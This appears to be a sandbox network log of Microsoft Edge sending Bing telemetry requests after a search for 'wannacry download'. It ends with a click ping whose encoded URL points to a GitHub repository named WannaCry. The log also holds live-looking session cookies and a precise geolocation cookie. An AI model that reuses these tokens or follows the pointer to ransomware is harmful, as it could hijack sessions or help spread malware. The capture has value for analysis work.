cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: dsc=order=Video

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f4c2
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.PPT&DATA={%22S%22:693,%22E%22:1367,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.PPT&DATA={%22S%22:693,%22E%22:1367,%22T%22:0,%22I%22:0,%22N%22:{},%22M%22:{}}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: dsc=order=Video

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:20 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199060.1491fb5d
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1729199058438%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22717.000000004191%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1729199058439%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221922.000000020489%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1729199058439%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058534%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1729199058438%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%22717.000000004191%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1729199058439%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221922.000000020489%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1729199058439%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058534%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: dsc=order=Video
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210419

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:21 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199061.14920213
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 3079
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: dsc=order=Video
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210419

Response

HTTP/2.0 200

cache-control: private
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
access-control-allow-origin: *
x-eventid: 67117bd57d7c4254a0d579d2dc9346a5
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-koxF2I1rYzKTZlROUssqUm/soOkZ49V4zcIASaAj4vo='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 83AA5199F9084E7C8471586F8F157482 Ref B: LON601060104029 Ref C: 2024-10-17T21:04:21Z
content-length: 0
date: Thu, 17 Oct 2024 21:04:21 GMT
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:04:21 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199061.14920219
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057746%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057747%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057757%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057746%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057747%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057757%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: dsc=order=Video
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210419

Response

HTTP/2.0 200

cache-control: no-cache, must-revalidate
pragma: no-cache
content-length: 1211
content-type: text/html; charset=UTF-8
content-encoding: gzip
expires: Fri, 01 Jan 1990 00:00:00 GMT
vary: Accept-Encoding
access-control-allow-origin: *
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A8D60F3EC1D5415EBEA2AD2D38251773 Ref B: LON601060108025 Ref C: 2024-10-17T21:04:22Z
date: Thu, 17 Oct 2024 21:04:22 GMT
set-cookie: MSPTC=8c4Lmu2O20cUvDPqpm7k7eRM8BJLsbhZkml3xYVu9aY; domain=.bing.com; expires=Tue, 11-Nov-2025 21:04:22 GMT; path=/; Partitioned; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199062.149203cf
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 692
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: dsc=order=Video
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210419
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199060&WTS=63864795824

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:22 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199062.149203ce
POST

https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=D607FEFA2831486BA34E9C5873B1B63C&ID=SERP,5204.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3De0cea5766d443c76JmltdHM9MTcyOTEyMzIwMCZpZ3VpZD0zMDM4YWQ3ZC00ZDRmLTZjOTMtMmIyNC1iODY2NGNkODZkYmUmaW5zaWQ9NTIwNA%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D3038ad7d-4d4f-6c93-2b24-b8664cd86dbe%26psq%3Dwannacry%2Bdownload%26u%3Da1aHR0cHM6Ly9naXRodWIuY29tL2xpbWl0ZWNpL1dhbm5hQ3J5%26ntb%3D1

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/GLinkPingPost.aspx?IG=D607FEFA2831486BA34E9C5873B1B63C&ID=SERP,5204.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3De0cea5766d443c76JmltdHM9MTcyOTEyMzIwMCZpZ3VpZD0zMDM4YWQ3ZC00ZDRmLTZjOTMtMmIyNC1iODY2NGNkODZkYmUmaW5zaWQ9NTIwNA%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D3038ad7d-4d4f-6c93-2b24-b8664cd86dbe%26psq%3Dwannacry%2Bdownload%26u%3Da1aHR0cHM6Ly9naXRodWIuY29tL2xpbWl0ZWNpL1dhbm5hQ3J5%26ntb%3D1 HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
